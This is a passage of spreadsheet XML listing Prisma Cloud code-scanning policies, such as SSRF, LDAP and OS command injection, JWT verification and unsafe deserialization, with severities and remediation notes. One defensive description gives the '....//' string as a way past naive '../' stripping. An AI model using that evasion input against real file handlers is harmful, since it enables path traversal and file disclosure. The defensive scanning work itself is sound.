      <c r="O390" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P390" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q390" t="inlineStr"/>
      <c r="R390" t="inlineStr"/>
      <c r="S390" t="inlineStr"/>
      <c r="T390" t="b">
        <v>0</v>
      </c>
      <c r="U390" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V390" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W390" t="inlineStr">
        <is>
          <t>This policy identifies potential Server-Side Request Forgery (SSRF) vulnerabilities in Go (Golang) code, where user input is used in constructing or sending backend requests to third parties. Such vulnerabilities can be exploited by attackers to force requests to other systems or modify request data to cause unwanted actions.</t>
        </is>
      </c>
      <c r="X390" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-257</t>
        </is>
      </c>
      <c r="Y390" t="inlineStr"/>
      <c r="Z390" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA390" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB390" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC390" t="inlineStr">
        <is>
          <t>CKV3_SAST_257</t>
        </is>
      </c>
      <c r="AD390" t="b">
        <v>1</v>
      </c>
      <c r="AE390" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF390" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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0" t="inlineStr">
        <is>
          <t>66b1ded3-5847-48aa-b56d-15c7728b9358</t>
        </is>
      </c>
      <c r="AI390" t="inlineStr"/>
      <c r="AJ390" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK390" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" t="inlineStr"/>
      <c r="B391" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C391" s="2" t="inlineStr"/>
      <c r="D391" t="inlineStr"/>
      <c r="E391" t="inlineStr"/>
      <c r="F391" t="inlineStr"/>
      <c r="G391" t="b">
        <v>1</v>
      </c>
      <c r="H3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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J391" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K391" t="inlineStr">
        <is>
          <t>LDAP queries vulnerable to injection attacks</t>
        </is>
      </c>
      <c r="L391" t="inlineStr"/>
      <c r="M391" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N391" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O391" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P391" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q391" t="inlineStr"/>
      <c r="R391" t="inlineStr"/>
      <c r="S391" t="inlineStr"/>
      <c r="T391" t="b">
        <v>0</v>
      </c>
      <c r="U391" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V391" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W391" t="inlineStr">
        <is>
          <t>Alert LDAP queries is vulnerable to injection attacks</t>
        </is>
      </c>
      <c r="X391" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-61</t>
        </is>
      </c>
      <c r="Y391" t="inlineStr"/>
      <c r="Z391" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA391" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB391" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC391" t="inlineStr">
        <is>
          <t>CKV3_SAST_61</t>
        </is>
      </c>
      <c r="AD391" t="b">
        <v>1</v>
      </c>
      <c r="AE391" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF391" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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1" t="inlineStr">
        <is>
          <t>38ef2e0b-edc6-49d3-b343-b81b4c99627c</t>
        </is>
      </c>
      <c r="AI391" t="inlineStr"/>
      <c r="AJ391" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK391" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" t="inlineStr"/>
      <c r="B392" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C392" s="2" t="inlineStr"/>
      <c r="D392" t="inlineStr"/>
      <c r="E392" t="inlineStr"/>
      <c r="F392" t="inlineStr"/>
      <c r="G392" t="b">
        <v>1</v>
      </c>
      <c r="H3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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J392" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K392" t="inlineStr">
        <is>
          <t>Improper handling of highly compressed data</t>
        </is>
      </c>
      <c r="L392" t="inlineStr"/>
      <c r="M392" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N392" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O392" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P392" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q392" t="inlineStr"/>
      <c r="R392" t="inlineStr"/>
      <c r="S392" t="inlineStr"/>
      <c r="T392" t="b">
        <v>0</v>
      </c>
      <c r="U392" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V392" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W392" t="inlineStr">
        <is>
          <t>This policy identifies improper handling of highly compressed data in Go (Golang) code, which can lead to data amplification vulnerabilities. It targets the use of various compression and archive readers without proper data size limitations. The policy ensures that data read from compressed sources is appropriately limited to prevent potential resource exhaustion and denial of service attacks.</t>
        </is>
      </c>
      <c r="X392" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/golang-policies/sast-policy-251</t>
        </is>
      </c>
      <c r="Y392" t="inlineStr"/>
      <c r="Z392" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA392" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB392" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC392" t="inlineStr">
        <is>
          <t>CKV3_SAST_251</t>
        </is>
      </c>
      <c r="AD392" t="b">
        <v>1</v>
      </c>
      <c r="AE392" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF392" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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2" t="inlineStr">
        <is>
          <t>4033a340-b758-4dc7-b964-5f7154ecb5a4</t>
        </is>
      </c>
      <c r="AI392" t="inlineStr"/>
      <c r="AJ392" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK392" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" t="inlineStr"/>
      <c r="B393" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C393" s="2" t="inlineStr"/>
      <c r="D393" t="inlineStr"/>
      <c r="E393" t="inlineStr"/>
      <c r="F393" t="inlineStr"/>
      <c r="G393" t="b">
        <v>1</v>
      </c>
      <c r="H3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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J393" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K393" t="inlineStr">
        <is>
          <t>Unencrypted payload with JWT</t>
        </is>
      </c>
      <c r="L393" t="inlineStr"/>
      <c r="M393" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N393" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O393" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P393" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q393" t="inlineStr"/>
      <c r="R393" t="inlineStr"/>
      <c r="S393" t="inlineStr"/>
      <c r="T393" t="b">
        <v>0</v>
      </c>
      <c r="U393" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V393" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W393" t="inlineStr">
        <is>
          <t>Ensure that when using JWT the payload of the token is cryptographically encrypted</t>
        </is>
      </c>
      <c r="X393" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-151</t>
        </is>
      </c>
      <c r="Y393" t="inlineStr"/>
      <c r="Z393" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA393" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB393" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC393" t="inlineStr">
        <is>
          <t>CKV3_SAST_151</t>
        </is>
      </c>
      <c r="AD393" t="b">
        <v>1</v>
      </c>
      <c r="AE393" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF393" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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3" t="inlineStr">
        <is>
          <t>a9f4cb36-1f70-4ac9-a6aa-498ce2c59f40</t>
        </is>
      </c>
      <c r="AI393" t="inlineStr"/>
      <c r="AJ393" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK393" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" t="inlineStr"/>
      <c r="B394" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C394" s="2" t="inlineStr"/>
      <c r="D394" t="inlineStr"/>
      <c r="E394" t="inlineStr"/>
      <c r="F394" t="inlineStr"/>
      <c r="G394" t="b">
        <v>1</v>
      </c>
      <c r="H3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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J394" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K394" t="inlineStr">
        <is>
          <t>HTTP response headers should not be vulnerable to injection attacks</t>
        </is>
      </c>
      <c r="L394" t="inlineStr"/>
      <c r="M394" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N394" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O394" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P394" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q394" t="inlineStr"/>
      <c r="R394" t="inlineStr"/>
      <c r="S394" t="inlineStr"/>
      <c r="T394" t="b">
        <v>0</v>
      </c>
      <c r="U394" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V394" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W394" t="inlineStr">
        <is>
          <t>HTTP response headers should not be vulnerable to injection attacks.</t>
        </is>
      </c>
      <c r="X394" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-88</t>
        </is>
      </c>
      <c r="Y394" t="inlineStr"/>
      <c r="Z394" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA394" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB394" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC394" t="inlineStr">
        <is>
          <t>CKV3_SAST_88</t>
        </is>
      </c>
      <c r="AD394" t="b">
        <v>1</v>
      </c>
      <c r="AE394" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF394" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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4" t="inlineStr">
        <is>
          <t>61a66d80-b1f0-4ae2-9583-245bf02cb72d</t>
        </is>
      </c>
      <c r="AI394" t="inlineStr"/>
      <c r="AJ394" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK394" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" t="inlineStr"/>
      <c r="B395" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C395" s="2" t="inlineStr"/>
      <c r="D395" t="inlineStr"/>
      <c r="E395" t="inlineStr"/>
      <c r="F395" t="inlineStr"/>
      <c r="G395" t="b">
        <v>1</v>
      </c>
      <c r="H3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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J395" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K395" t="inlineStr">
        <is>
          <t>Cookie stored for an extended period of time</t>
        </is>
      </c>
      <c r="L395" t="inlineStr"/>
      <c r="M395" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N395" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O395" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P395" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q395" t="inlineStr"/>
      <c r="R395" t="inlineStr"/>
      <c r="S395" t="inlineStr"/>
      <c r="T395" t="b">
        <v>0</v>
      </c>
      <c r="U395" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V395" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W395" t="inlineStr">
        <is>
          <t>Storing sensitive data in a persistent cookie for an extended period can lead to a breach of confidentiality or account compromise.</t>
        </is>
      </c>
      <c r="X395" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-20</t>
        </is>
      </c>
      <c r="Y395" t="inlineStr"/>
      <c r="Z395" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA395" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB395" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC395" t="inlineStr">
        <is>
          <t>CKV3_SAST_20</t>
        </is>
      </c>
      <c r="AD395" t="b">
        <v>1</v>
      </c>
      <c r="AE395" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF395" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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5" t="inlineStr">
        <is>
          <t>5ee5c1c4-4136-48a9-b30c-2d13eb2a4622</t>
        </is>
      </c>
      <c r="AI395" t="inlineStr"/>
      <c r="AJ395" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK395" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" t="inlineStr"/>
      <c r="B396" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C396" s="2" t="inlineStr"/>
      <c r="D396" t="inlineStr"/>
      <c r="E396" t="inlineStr"/>
      <c r="F396" t="inlineStr"/>
      <c r="G396" t="b">
        <v>1</v>
      </c>
      <c r="H3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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J396" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K396" t="inlineStr">
        <is>
          <t>Use of module setting superuser port</t>
        </is>
      </c>
      <c r="L396" t="inlineStr"/>
      <c r="M396" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N396" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O396" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P396" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q396" t="inlineStr"/>
      <c r="R396" t="inlineStr"/>
      <c r="S396" t="inlineStr"/>
      <c r="T396" t="b">
        <v>0</v>
      </c>
      <c r="U396" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V396" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W396" t="inlineStr">
        <is>
          <t>Detects the use of a module setting a superuser port below 1024 in Python, potentially indicating an authentication bypass vulnerability</t>
        </is>
      </c>
      <c r="X396" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-11</t>
        </is>
      </c>
      <c r="Y396" t="inlineStr"/>
      <c r="Z396" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA396" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB396" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC396" t="inlineStr">
        <is>
          <t>CKV3_SAST_11</t>
        </is>
      </c>
      <c r="AD396" t="b">
        <v>1</v>
      </c>
      <c r="AE396" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF396" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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6" t="inlineStr">
        <is>
          <t>64e004f9-e8fa-4cdf-8cb0-0d1e43f2d270</t>
        </is>
      </c>
      <c r="AI396" t="inlineStr"/>
      <c r="AJ396" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK396" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" t="inlineStr"/>
      <c r="B397" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C397" s="2" t="inlineStr"/>
      <c r="D397" t="inlineStr"/>
      <c r="E397" t="inlineStr"/>
      <c r="F397" t="inlineStr"/>
      <c r="G397" t="b">
        <v>1</v>
      </c>
      <c r="H3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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J397" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K397" t="inlineStr">
        <is>
          <t>Improper use of OS command input</t>
        </is>
      </c>
      <c r="L397" t="inlineStr"/>
      <c r="M397" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N397" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O397" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P397" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q397" t="inlineStr"/>
      <c r="R397" t="inlineStr"/>
      <c r="S397" t="inlineStr"/>
      <c r="T397" t="b">
        <v>0</v>
      </c>
      <c r="U397" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V397" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W397" t="inlineStr">
        <is>
          <t>The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.</t>
        </is>
      </c>
      <c r="X397" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/javascript-policies/sast-policy-177</t>
        </is>
      </c>
      <c r="Y397" t="inlineStr"/>
      <c r="Z397" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA397" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB397" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC397" t="inlineStr">
        <is>
          <t>CKV3_SAST_177</t>
        </is>
      </c>
      <c r="AD397" t="b">
        <v>1</v>
      </c>
      <c r="AE397" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF397" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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7" t="inlineStr">
        <is>
          <t>1f8fba75-7963-405f-a86b-ef7384d58cd3</t>
        </is>
      </c>
      <c r="AI397" t="inlineStr"/>
      <c r="AJ397" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK397" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" t="inlineStr"/>
      <c r="B398" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C398" s="2" t="inlineStr"/>
      <c r="D398" t="inlineStr"/>
      <c r="E398" t="inlineStr"/>
      <c r="F398" t="inlineStr"/>
      <c r="G398" t="b">
        <v>1</v>
      </c>
      <c r="H3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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J398" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K398" t="inlineStr">
        <is>
          <t>JWTs are decoded or processed without proper verification of their signature</t>
        </is>
      </c>
      <c r="L398" t="inlineStr"/>
      <c r="M398" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N398" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O398" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P398" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q398" t="inlineStr"/>
      <c r="R398" t="inlineStr"/>
      <c r="S398" t="inlineStr"/>
      <c r="T398" t="b">
        <v>0</v>
      </c>
      <c r="U398" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V398" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W398" t="inlineStr">
        <is>
          <t>Found an instance where the JWT decoding or processing is performed without proper verification of the token's signature</t>
        </is>
      </c>
      <c r="X398" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/python-policies/sast-policy-54</t>
        </is>
      </c>
      <c r="Y398" t="inlineStr"/>
      <c r="Z398" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA398" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB398" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC398" t="inlineStr">
        <is>
          <t>CKV3_SAST_54</t>
        </is>
      </c>
      <c r="AD398" t="b">
        <v>1</v>
      </c>
      <c r="AE398" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF398" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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8" t="inlineStr">
        <is>
          <t>731579cb-dfd1-40a3-9fdf-64b26a6cbd94</t>
        </is>
      </c>
      <c r="AI398" t="inlineStr"/>
      <c r="AJ398" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK398" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" t="inlineStr"/>
      <c r="B399" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C399" s="2" t="inlineStr"/>
      <c r="D399" t="inlineStr"/>
      <c r="E399" t="inlineStr"/>
      <c r="F399" t="inlineStr"/>
      <c r="G399" t="b">
        <v>1</v>
      </c>
      <c r="H3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99" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J399" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K399" t="inlineStr">
        <is>
          <t>Collapse of data into unsafe value</t>
        </is>
      </c>
      <c r="L399" t="inlineStr"/>
      <c r="M399" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N399" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O399" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P399" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q399" t="inlineStr"/>
      <c r="R399" t="inlineStr"/>
      <c r="S399" t="inlineStr"/>
      <c r="T399" t="b">
        <v>0</v>
      </c>
      <c r="U399" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V399" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W399" t="inlineStr">
        <is>
          <t>Flawed input validation modifies strings after checks. Exploits can bypass this, like using '....//' to evade '../' removal. Modify strings before validation. For security, encode strings, not just replace/remove. Against path traversal, prefer randomly generated IDs/filenames.</t>
        </is>
      </c>
      <c r="X399" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-103</t>
        </is>
      </c>
      <c r="Y399" t="inlineStr"/>
      <c r="Z399" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA399" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB399" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC399" t="inlineStr">
        <is>
          <t>CKV3_SAST_103</t>
        </is>
      </c>
      <c r="AD399" t="b">
        <v>1</v>
      </c>
      <c r="AE399" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF399" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG3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99" t="inlineStr">
        <is>
          <t>ae2d0b52-3a63-4c44-bc75-d899129c6317</t>
        </is>
      </c>
      <c r="AI399" t="inlineStr"/>
      <c r="AJ399" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK399" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" t="inlineStr"/>
      <c r="B400" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C400" s="2" t="inlineStr"/>
      <c r="D400" t="inlineStr"/>
      <c r="E400" t="inlineStr"/>
      <c r="F400" t="inlineStr"/>
      <c r="G400" t="b">
        <v>1</v>
      </c>
      <c r="H4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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J400" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="K400" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data</t>
        </is>
      </c>
      <c r="L400" t="inlineStr"/>
      <c r="M400" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N400" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O400" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P400" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q400" t="inlineStr"/>
      <c r="R400" t="inlineStr"/>
      <c r="S400" t="inlineStr"/>
      <c r="T400" t="b">
        <v>0</v>
      </c>
      <c r="U400" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V400" t="inlineStr">
        <is>
          <t>Code:Sast:</t>
        </is>
      </c>
      <c r="W400" t="inlineStr">
        <is>
          <t>Deserialization vulnerability in Java code. Malicious actors exploit these to inject code or manipulate data. Recommendations: use JSON for serialization, specify allowed deserialization objects, and avoid base types.</t>
        </is>
      </c>
      <c r="X400" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/sast-policies/java-policies/sast-policy-105</t>
        </is>
      </c>
      <c r="Y400" t="inlineStr"/>
      <c r="Z400" t="inlineStr">
        <is>
          <t>{"category":"Sast","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA400" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB400" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC400" t="inlineStr">
